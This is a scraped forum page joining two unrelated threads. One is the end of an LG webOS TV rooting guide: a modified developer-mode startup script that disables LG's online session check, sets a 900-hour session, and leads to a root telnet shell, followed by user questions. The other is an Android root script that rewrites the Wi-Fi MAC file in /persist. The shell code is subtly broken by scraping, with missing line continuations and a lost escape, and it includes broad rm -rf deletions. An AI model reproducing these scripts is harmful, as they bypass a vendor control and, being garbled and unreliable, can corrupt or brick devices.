# PASSPHRASE="`/usr/bin/nyx-cmd DeviceInfo query nduid | head -c 6 | tr 'a-z' 'A-Z'`"
# PASSPHRASE="`/usr/bin/nyx-cmd DeviceInfo query nduid | tail -n1 | head -c 6 | tr 'a-z' 'A-Z'`"
PASSPHRASE="`tail /var/lib/secretagent/nduid -c 40 | head -c 6 | tr 'a-z' 'A-Z'`"
${CRYPTO_SSH}/bin/ssh-keygen -t rsa -C "[email protected]" -N "${PASSPHRASE}" -f /var/lib/devmode/ssh/webos_rsa
# copy ssh key to /var/luna/preferences so the devmode service's KeyServer can read it and serve to ares-webos-cli tools
cp -f /var/lib/devmode/ssh/webos_rsa /var/luna/preferences/webos_rsa
chmod 0644 /var/luna/preferences/webos_rsa
# if we generated a new ssh key, make sure we re-create the authorized_keys file
rm -f ${DEVELOPER_HOME}/.ssh/authorized_keys
fi
# Make sure the /media/developer (and log) directories exists (as sam.conf erases it when devmode is off):
mkdir -p ${DEVELOPER_HOME}/log
chmod 777 ${DEVELOPER_HOME} ${DEVELOPER_HOME}/log
# Install the SSH key into the authorized_keys file (if it doesn't already exist)
if [ ! -e ${DEVELOPER_HOME}/.ssh/authorized_keys ] ; then
mkdir -p ${DEVELOPER_HOME}/.ssh
cp -f /var/lib/devmode/ssh/webos_rsa.pub ${DEVELOPER_HOME}/.ssh/authorized_keys || true
# NOTE: authorized_keys MUST be world-readable else sshd can't read it inside the devmode jail
# To keep sshd from complaining about that, we launch sshd with -o "StrictModes no" (below).
chmod 755 ${DEVELOPER_HOME}/.ssh
chmod 644 ${DEVELOPER_HOME}/.ssh/authorized_keys
chown -R developer:developer ${DEVELOPER_HOME}/.ssh
fi
# FIXME: Can we move this to /var/run/devmode/sshd ?
# Create PrivSep dir
mkdir -p /var/run/sshd
chmod 0755 /var/run/sshd
# Create directory for host keys (rather than /opt/openssh/etc/ssh/)
HOST_KEY_DIR="/var/lib/devmode/sshd"
if [ ! -d "${HOST_KEY_DIR}" ] ; then
mkdir -p ${HOST_KEY_DIR}
chmod 0700 ${HOST_KEY_DIR}
fi
# Create initial keys if necessary
if [ ! -f ${HOST_KEY_DIR}/ssh_host_rsa_key ]; then
echo " generating ssh RSA key..."
${CRYPTO_SSH}/bin/ssh-keygen -q -f ${HOST_KEY_DIR}/ssh_host_rsa_key -N '' -t rsa
fi
if [ ! -f ${HOST_KEY_DIR}/ssh_host_ecdsa_key ]; then
echo " generating ssh ECDSA key..."
${CRYPTO_SSH}/bin/ssh-keygen -q -f ${HOST_KEY_DIR}/ssh_host_ecdsa_key -N '' -t ecdsa
fi
if [ ! -f ${HOST_KEY_DIR}/ssh_host_dsa_key ]; then
echo " generating ssh DSA key..."
${CRYPTO_SSH}/bin/ssh-keygen -q -f ${HOST_KEY_DIR}/ssh_host_dsa_key -N '' -t dsa
fi
# Check config
# NOTE: This should only be enabled for testing
#${CRYPTO_SSH}/sbin/sshd -f ${CRYPTO_SSH}/etc/ssh/sshd_config -h ${HOST_KEY_DIR}/ssh_host_rsa_key -t
# Set jailer command
DEVMODE_JAIL="/usr/bin/jailer -t native_devmode -i com.palm.devmode.openssh -p ${DEVELOPER_HOME}/ -s /bin/sh"
#DEVMODE_JAIL="echo"
# Add for debugging, but this will cause sshd to exit after the first ssh login:
# -ddd -e
# Make environment file for openssh
DEVMODE_JAIL_CONF="/etc/jail_native_devmode.conf"
DEVMODE_OPENSSH_ENV="${DEVELOPER_HOME}/.ssh/environment"
if [ -f ${DEVMODE_JAIL_CONF} ]; then
echo " generating environment file from jail_native_devmode.conf..."
find ${DEVMODE_JAIL_CONF} | xargs awk '/setenv/{printf "%s=%sn", $2,$3}' > ${DEVMODE_OPENSSH_ENV}
${DEVMODE_JAIL} /usr/bin/env >> ${DEVMODE_OPENSSH_ENV}
fi
# Set path for devmode
if [ -f ${DEVMODE_OPENSSH_ENV} ]; then
echo "PATH=${PATH}:${OPT_DEVMODE}/usr/bin" >> ${DEVMODE_OPENSSH_ENV}
fi
sleep 5;
for interface in $(ls /sys/class/net/ | grep -v -e lo -e sit);
do
if [ -r /sys/class/net/$interface/carrier ] ; then
if [[ $(cat /sys/class/net/$interface/carrier) == 1 ]]; then OnLine=1; fi
fi
done
#if [ $OnLine ]; then
# sessionToken=$(cat /var/luna/preferences/devmode_enabled);
# checkSession=$(curl --max-time 3 -s https://developer.lge.com/secure/CheckDevModeSession.dev?sessionToken=$sessionToken);
# if [ "$checkSession" != "" ] ; then
# result=$(node -pe 'JSON.parse(process.argv[1]).result' "$checkSession");
# if [ "$result" == "success" ] ; then
rm -rf /var/luna/preferences/dc*;
# # create devSessionTime file to remain session time in devmode app
# remainTime=$(node -pe 'JSON.parse(process.argv[1]).errorMsg' "$checkSession");
# resultValidTimeCheck=$(echo "${remainTime}" | egrep "^([0-9]{1,4}(:[0-5][0-9]){2})$");
# if [ "$resultValidTimeCheck" != "" ] ; then
echo '900:00:00' > ${DEVMODE_SERVICE_DIR}/devSessionTime;
chgrp 5000 ${DEVMODE_SERVICE_DIR}/devSessionTime;
chmod 664 ${DEVMODE_SERVICE_DIR}/devSessionTime;
# fi
# elif [ "$result" == "fail" ] ; then
# rm -rf /var/luna/preferences/devmode_enabled;
# rm -rf /var/luna/preferences/dc*;
# if [ -e ${DEVMODE_SERVICE_DIR}/devSessionTime ] ; then
# rm ${DEVMODE_SERVICE_DIR}/devSessionTime;
# fi
# fi
# fi
#fi
# Cache clear function added (except Local storage)
if [ -e ${DEVMODE_SERVICE_DIR}/devCacheClear ] ; then
rm -rf `ls | find /var/lib/webappmanager*/* -name "Local Storage" -o -name "localstorage" -prune -o -print`;
rm ${DEVMODE_SERVICE_DIR}/devCacheClear;
fi
# Launch sshd
${DEVMODE_JAIL} ${OPT_SSH}/sbin/sshd
-o StrictModes=no
-f ${OPT_SSH}/etc/ssh/sshd_config
-h ${HOST_KEY_DIR}/ssh_host_rsa_key
-o PasswordAuthentication=no -o PermitRootLogin=no -o PermitUserEnvironment=yes
-D -p ${SSH_PORT}
7) Upload new start-devmode.sh and rewrite the old one
Code:
cp /tmp/start-devmode.sh /media/cryptofs/apps/usr/palm/services/com.palmdts.devmode.service/start-devmode.sh
8) Restart TV.
Connect with telnet and type previously entered password.
Code:
telnet <ip-tv>
Trying <ip-tv>...
Connected to <ip-tv>].
Escape character is '^]'.
webOS TV 1.4.0 LGSmartTV
Give root password for system maintenance
(or type Control-D for normal startup):
Entering System Maintenance Mode
[email protected]:/#
Does it work on WebOS 3.5 devices?
medi01 said:
Does it work on WebOS 3.5 devices?
Click to expand...
Click to collapse
Positive.
is it possible to install webOS 3.0 on an 65EF9500 that currently has WebOS 2.0 via the USB upgrade method?
enkrypt3d said:
is it possible to install webOS 3.0 on an 65EF9500 that currently has WebOS 2.0 via the USB upgrade method?
Click to expand...
Click to collapse
No
Is there any method to get 3.0 installed over 1.4 I have a 49ub8500-ua
syconu said:
Is there any method to get 3.0 installed over 1.4 I have a 49ub8500-ua
Click to expand...
Click to collapse
No
Is there anything hack related that I can do with this to and can is support a new air mouse with a dongle
Ok, so I get run the root app and first ,second , and third stage all are good. then it says try get root password is 1111. But the terminal keeps freezing after that happens. A couple times my tv rebooted too. I cant figure out what i could have messed up. ANyone with any experience using this method have any legit information?
steven817817 said:
Ok, so I get run the root app and first ,second , and third stage all are good. then it says try get root password is 1111. But the terminal keeps freezing after that happens. A couple times my tv rebooted too. I cant figure out what i could have messed up. ANyone with any experience using this method have any legit information?
Click to expand...
Click to collapse
Try to delete all 'cache' files from exploit at /media/developer. It doesn't wotk twice as far as I concerned
Is there anyway I can root my 1.4.0 and if so what r the benefits of the root? Can I install Android or kodi? What's the point
teffd said:
Try to delete all 'cache' files from exploit at /media/developer. It doesn't wotk twice as far as I concerned
Click to expand...
Click to collapse
I tried it stil seems to finish step 3 then says enter 1111. But this is where it freezes up and does not get any further.
Is this still working on 3.6? I'm stuck at try to install any app from market.
Mazda77 said:
Positive.
Click to expand...
Click to collapse
Which TV and firmware version?
Is this possible with UJ63 serie?
Hi, would the root access allow somehow to connect other bluetooth devices different than LG? Thanks!
You can do pretty much anything to the system with root, even include support for unsupported devices in form of additional kernel modules.
For example, I've added Samba support so I can mount use my NAS (see my blog at ddscentral dot org for details).
Hey guys is it possible to install android apps into WebOS? I just bought an Lg oled LG 55EG9A7V i want to use Perfect Player IPTV but i cant install it right now...Other then that i dont need anything else..
Can anyone help me?

reset mac address (tested on lineage os)

original: https://cafe.naver.com/dr1phone/70671
some of it has mac address like 82:82:FF:bla:bla
this may occur some problems using wifi
but this is not a rom's problem,
It is default value of your phone
(why they made it like this?)
you can fix it simply using this script(attached)
run as root using bash on twrp shell or terminal emulator
Code:
echo "* created by djdisodo! *"
echo "Mounting filesystems..."
echo "generating mac address"
export MAC=$(dd if=/dev/urandom bs=1024 count=1 2>/dev/null | md5sum | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1\2\3\4\5\6/')
echo "remounting /persist"
umount /persist
mount -t ext4 /dev/block/bootdevice/by-name/persist /persist
echo "new mac address: " $MAC
echo "removing old mac address"
rm -f /persist/wlan_mac.bin
echo "writing new mac address"
echo $MAC | echo -n -e $(tr -d '[:space:]' | sed 's/../\\x&/g') >> /persist/wlan_mac.bin
for i in $(seq 0 17)
do
echo -n '\0' >> /persist/wlan_mac.bin
done
echo "changing permissions"
chmod 644 /persist/wlan_mac.bin
echo "unmounting partition"
umount /persist
echo "done!"
exit 0
I wanted to make it to flashable zip
but i couldn't
someone will do?

Categories

Resources